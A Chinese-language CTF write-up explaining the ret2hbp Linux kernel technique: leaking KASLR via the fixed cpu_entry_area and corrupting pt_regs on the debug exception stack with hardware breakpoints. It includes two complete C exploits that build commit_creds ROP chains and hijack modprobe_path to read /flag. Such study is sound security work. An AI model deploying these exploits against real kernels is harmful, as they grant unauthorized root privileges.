ret2hbp 将任意地址写转为堆栈越界读写

Bringing back the stack attack…
KASLR最后的余晖罢了…

要在任意地址读的情况下Defeate KASLR,很自然的思路是寻找虚拟地址空间中未随机化的空间.(如FG-KASLR的绕过方式).
cpu_entry_area mapping固定在0xfffffe0000000000.

关于cpu_entry_area的描述:
https://www.kernel.org/doc/html/latest/arch/x86/pti.html?highlight=cpu_entry_area#page-table-isolation-pti
总结一下,为引入KPTI,用户页表中需要保存进入和退出内核所需要的数据,这些数据就映射到一个固定的区域cpu_entry_area.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*
* cpu_entry_area is a percpu region that contains things needed by the CPU
* and early entry/exit code. Real types aren't used for all fields here
* to avoid circular header dependencies.
*
* Every field is a virtual alias of some other allocated backing store.
* There is no direct allocation of a struct cpu_entry_area.
*/
struct cpu_entry_area {
char gdt[PAGE_SIZE];

/*
* The GDT is just below entry_stack and thus serves (on x86_64) as
* a read-only guard page. On 32-bit the GDT must be writeable, so
* it needs an extra guard page.
*/
#ifdef CONFIG_X86_32
char guard_entry_stack[PAGE_SIZE];
#endif
struct entry_stack_page entry_stack_page;

#ifdef CONFIG_X86_32
char guard_doublefault_stack[PAGE_SIZE];
struct doublefault_stack doublefault_stack;
#endif

/*
* On x86_64, the TSS is mapped RO. On x86_32, it's mapped RW because
* we need task switches to work, and task switches write to the TSS.
*/
struct tss_struct tss;

#ifdef CONFIG_X86_64
/*
* Exception stacks used for IST entries with guard pages.
*/
struct cea_exception_stacks estacks;
#endif
/*
* Per CPU debug store for Intel performance monitoring. Wastes a
* full page at the moment.
*/
struct debug_store cpu_debug_store;
/*
* The actual PEBS/BTS buffers must be mapped to user space
* Reserve enough fixmap PTEs.
*/
struct debug_store_buffers cpu_debug_buffers;
};

其中的estacks是Interrupt-Stack的映射.
IST机制: https://www.cs.utexas.edu/~vijay/cs378-f17/projects/AMD64_Architecture_Programmers_Manual.pdf#G14.908888https://www.kernel.org/doc/html/latest/arch/x86/kernel-stacks.html

A new feature introduced in the AMD64 extensions is called the Interrupt Stack Table (IST), which also resides in the TSS and contains logical (segment+offset) stack pointers. If an interrupt descriptor table specifies an IST entry to use (there are 7), the processor will load the new stack from the IST instead. This allows known-good stacks to be used in case of serious errors (NMI or Double fault for example). Previously, the entry for the exception or interrupt in the IDT pointed to a task gate, causing the processor to switch to the task that is pointed by the task gate. The original register values were saved in the TSS current at the time the interrupt or exception occurred. The processor then set the registers, including SS:ESP, to a known value specified in the TSS and saved the selector to the previous TSS. The problem here is that hardware task switching is not supported on AMD64.

当某中断的IDT条目中IST序号不为0,则当该中断发生时会从TSS中无条件将栈切换到对应的Interrupt-Stack并进行异常处理.同时向栈中压入pt_regs结构.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/* Macro to enforce the same ordering and stack sizes */
#define ESTACKS_MEMBERS(guardsize, optional_stack_size) \
char DF_stack_guard[guardsize]; \
char DF_stack[EXCEPTION_STKSZ]; \
char NMI_stack_guard[guardsize]; \
char NMI_stack[EXCEPTION_STKSZ]; \
char DB_stack_guard[guardsize]; \
char DB_stack[EXCEPTION_STKSZ]; \
char MCE_stack_guard[guardsize]; \
char MCE_stack[EXCEPTION_STKSZ]; \
char VC_stack_guard[guardsize]; \
char VC_stack[optional_stack_size]; \
char VC2_stack_guard[guardsize]; \
char VC2_stack[optional_stack_size]; \
char IST_top_guard[guardsize]; \

于是类似于早期内核栈中保存的pt_regs作栈迁移的手法,这里也可以直接栈迁移.

更强大的利用是,当内核触发该类异常时,若改变栈上的pt_regs结构,便可劫持内核.若内核在读一段内存时触发该类中断,攻击者通过漏洞更改rcx寄存器(通常用于循环中的计数),即可造成越界读,同理可以造成越界写.
而越界读写,无论是在堆上还是栈上,都是Defeate KASLR的有利手段.

具体来说,比如uname调用是一个很好的栈上的越界读取.

1
2
3
4
5
6
7
8
9
10
// >>> kernel/sys.c:1280
/* 1280 */ SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)
/* 1281 */ {
/* 1282 */ struct new_utsname tmp;
/* 1283 */
/* 1284 */ down_read(&uts_sem);
/* 1285 */ memcpy(&tmp, utsname(), sizeof(tmp));
/* 1286 */ up_read(&uts_sem);
/* 1287 */ if (copy_to_user(name, &tmp, sizeof(tmp)))
/* 1288 */ return -EFAULT;

prctl_set_mm_map是一个很好的栈上的越界写入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// >>> kernel/sys.c:1955
/* 1955 */ #ifdef CONFIG_CHECKPOINT_RESTORE
/* 1956 */ static int prctl_set_mm_map(int opt, const void __user *addr, unsigned long data_size)
/* 1957 */ {
// 目标栈上临时对象
/* 1958 */ struct prctl_mm_map prctl_map = { .exe_fd = (u32)-1, };
------
// 调用copy_from_user,结合任意地址写原语和硬件断点,做到栈溢出ROP攻击
/* 1973 */ if (copy_from_user(&prctl_map, addr, sizeof(prctl_map)))
/* 1974 */ return -EFAULT;
/* 1975 */
// 对prctl_map对象内容进行校验,失败后快速返回触发ROP,不多调用函数
/* 1976 */ error = validate_prctl_map_addr(&prctl_map);
/* 1977 */ if (error)
/* 1978 */ return error;

总结下攻击流程:
父进程fork出子进程victim
父进程ptrace victim,父进程给victim设置硬件断点
父进程fork出子进程trigger,循环触发任意地址写原语修改DEBUG Exception stack中的cx寄存器值
victim进程循环调用uname syscall,并检查buffer中是否发现stack leak,如果发现就发送给父进程
父进程拿着stack leak编写出ROP代码发送给victim
victim进程循环调用prctl syscall触发目标copy_from_user,直到发生栈溢出ROP提权。

在6.2版本后的内核已经为该区域加上了随机化,并不只是基址随机化,而是每个entry都进行了随机化.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static __init void init_cea_offsets(void)
{
unsigned int max_cea;
unsigned int i, j;

if (!kaslr_enabled()) {
for_each_possible_cpu(i)
per_cpu(_cea_offset, i) = i;
return;
}

max_cea = (CPU_ENTRY_AREA_MAP_SIZE - PAGE_SIZE) / CPU_ENTRY_AREA_SIZE;

/* O(sodding terrible) */
for_each_possible_cpu(i) {
unsigned int cea;

again:
cea = get_random_u32_below(max_cea);

for_each_possible_cpu(j) {
if (cea_offset(j) == cea)
goto again;

if (i == j)
break;
}

per_cpu(_cea_offset, i) = cea;
}
}

/* Is called from entry code, so must be noinstr */
noinstr struct cpu_entry_area *get_cpu_entry_area(int cpu)
{
unsigned long va = CPU_ENTRY_AREA_PER_CPU + cea_offset(cpu) * CPU_ENTRY_AREA_SIZE;
BUILD_BUG_ON(sizeof(struct cpu_entry_area) % PAGE_SIZE != 0);

return (struct cpu_entry_area *) va;
}
EXPORT_SYMBOL(get_cpu_entry_area);

sycrop

分析

给了一次内核任意地址的四字节读和一次栈迁移的机会.
从cpu_entry_area读泄露kbase,fork出子进程触发一次硬件断点,cpu_entry_area异常处理栈中留下pt_regs结构.再栈迁移到中的pt_regs结构即可完成在通用寄存器中布置的ROP链.


EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#include <kernelpwn.h>
#include <stdio.h>
#include <stdlib.h>


#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))
void create_hbp(pid_t pid, void *addr) {

// Set DR0: HBP address
if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr) != 0) {
die("create hbp ptrace dr0: %m");
}

/* Set DR7: bit 0 enables DR0 breakpoint. Bit 8 ensures the processor stops
* on the instruction which causes the exception. bits 16,17 means we stop
* on data read or write. */
unsigned long dr_7 = (1 << 0) | (1 << 8) | (1 << 16) | (1 << 17);
if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr_7) != 0) {
die("create hbp ptrace dr7: %m");
}
}

void child_func()
{
ptrace(PTRACE_TRACEME,0,NULL,NULL);
raise(SIGSTOP);
logd("Child Weakup");

__asm__(
".intel_syntax noprefix;"
"mov r15,pop_rdi;"
"mov r14,init_cred;"
"mov r13,commit_creds;"
"mov r12,swapgs_ret2user;"
"mov rbp, 0;"
"mov rbx, 0;"
"mov r11, user_rip;"
"mov r10, user_cs;"
"mov r9, user_rflags;"
"mov r8, user_sp;"
"mov rax, user_ss;"
"mov rcx, 0xdeadbeef;"
"mov rdx, 0xdeadbeef;"
"mov rsi, pbuf;"
"mov rdi, [rsi];"
".att_syntax;"
);
logd("Child Exit");
exit(1);
}

char buf[0x10];
size_t pbuf = &buf;


size_t commit_creds;
size_t prepare_creds;
size_t init_cred;
size_t pop_rdi;
size_t swapgs_ret2user;

int main()
{
setvbuf(stdout,NULL,_IONBF,0);
setvbuf(stderr,NULL,_IONBF,0);
save_status();
bind_core(0);

if((dev_fd = open("/dev/seven",O_RDWR))<0)
{
err_exit("open device");
}

kernel_base = (uint32_t)(ioctl(dev_fd,0x5555,0xfffffe0000000004))+
+0xffffffff00000000-0x1008e00ULL;
HEX("kernel_base",kernel_base);

commit_creds = kernel_base+0x000bb5b0;
prepare_creds = kernel_base+0x000bb9a0;
init_cred = kernel_base+0x01a4cbf8;
pop_rdi = kernel_base+0x2c9d;
swapgs_ret2user = kernel_base+0x01000ed0 + 49;

int pid;
if((pid = fork())==0)
{
user_sp += 8;
child_func();
}

int status;

//等待子进程暂停
waitpid(pid,&status,0);

create_hbp(pid,buf);
ptrace(PTRACE_CONT,pid,0,0);


//等待子进程触发断点
waitpid(pid,&status,0);
ptrace(PTRACE_CONT,pid,0,0);

//等待子进程退出
waitpid(pid,&status,0);


ioctl(dev_fd,0x6666,0xfffffe0000010f58);

}

hbp_attack_demo

分析

驱动就是一个无限制的任意写.利用就是之前所说,子进程1不断uname触发断点并查看是否泄露出内核栈,子进程2不断修改内核栈上的pt_regs.获取到内核地址后写modprobe_path读取flag.

在exc_debug函数下断点,查看rdi指向的空间,即为0xA8大小的pt_regs结构.
这里注意数据断点是会断在触发断点的那条访存指令的后一条指令,所以此时已经完成了8字节的一次拷贝.

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#include <kernelpwn.h>
#include <sys/utsname.h>

char buf[0x1000];
size_t* aligin_buf;
int sync_pipe[2];

void arb_write(uint64_t addr,uint64_t val)
{
struct ARG
{
uint64_t addr_;
uint64_t val_;
};

struct ARG arg = {.addr_=addr,.val_=val};

ioctl(dev_fd,0,&arg);
}


void check()
{
// hexdump(aligin_buf,0x400);
// HEX("aligin_buf",aligin_buf[51]);
if(((aligin_buf[51]&0xfff)==0xb32) && (aligin_buf[51]>0xffffffff81000000))
{
size_t canary = aligin_buf[47];
kernel_base = aligin_buf[51]-0xe0b32;
logi("got kernel_base");
write(sync_pipe[1],&kernel_base,8);
while(1);

}
}

void leak_kstack()
{
logd("leak_kstack init");
ptrace(PTRACE_TRACEME,0,NULL,NULL);
raise(SIGSTOP);

logd("leak_kstack start");

aligin_buf = buf+0xE;
while(1)
{
uname(buf);
check();
}


exit(0);

}



int main()
{
setvbuf(stdout,_IONBF,0,0);
save_status();
bind_core(0);


if((dev_fd = open("/dev/vuln",O_RDWR))<0)
{
err_exit("open device");
}

int pid1,pid2;

pipe(sync_pipe);
if((pid1 = fork())==0)
{
close(sync_pipe[0]);
leak_kstack();
}

close(sync_pipe[1]);

//等待child1暂停
waitpid(pid1,NULL,0);

create_hbp(pid1,buf);

//条件竞争写regs.rcx
if((pid2 = fork())==0)
{
bind_core(1);
logd("Trigger start");
while (1)
{
arb_write(0xfffffe0000010fb0,0x400);
}
exit(1);
}

ptrace(PTRACE_CONT,pid1,NULL,NULL);

//阻塞,等待子进程获取kernel_base;
read(sync_pipe[0],&kernel_base,8);
logd("Parent received kernel_base");
HEX("kernel_base",kernel_base);
kill(pid2,SIGKILL);


logd("modify modprobe_path");
size_t modprobe_path = kernel_base+0x01e8b920;
arb_write(modprobe_path,u64("/copy\0\0\0"));

system("echo -ne '#!/bin/sh\n/bin/cp /flag /Pwned\n/bin/chmod 777 /Pwned' > /copy");
system("chmod +x /copy");
system("echo -ne '\\xff\\xff\\xff\\xff' > /dummy");
system("chmod +x /dummy");

system("/dummy");

logi("Pwned by HanQi...");
system("cat /Pwned");
}

参考文章

https://veritas501.github.io/2023_03_22-%E4%B8%80%E7%A7%8D%E5%80%9F%E5%8A%A9%E7%A1%AC%E4%BB%B6%E6%96%AD%E7%82%B9%E7%9A%84%E6%8F%90%E6%9D%83%E6%80%9D%E8%B7%AF%E5%88%86%E6%9E%90/
https://blog.csdn.net/qq_61670993/article/details/134980555
https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信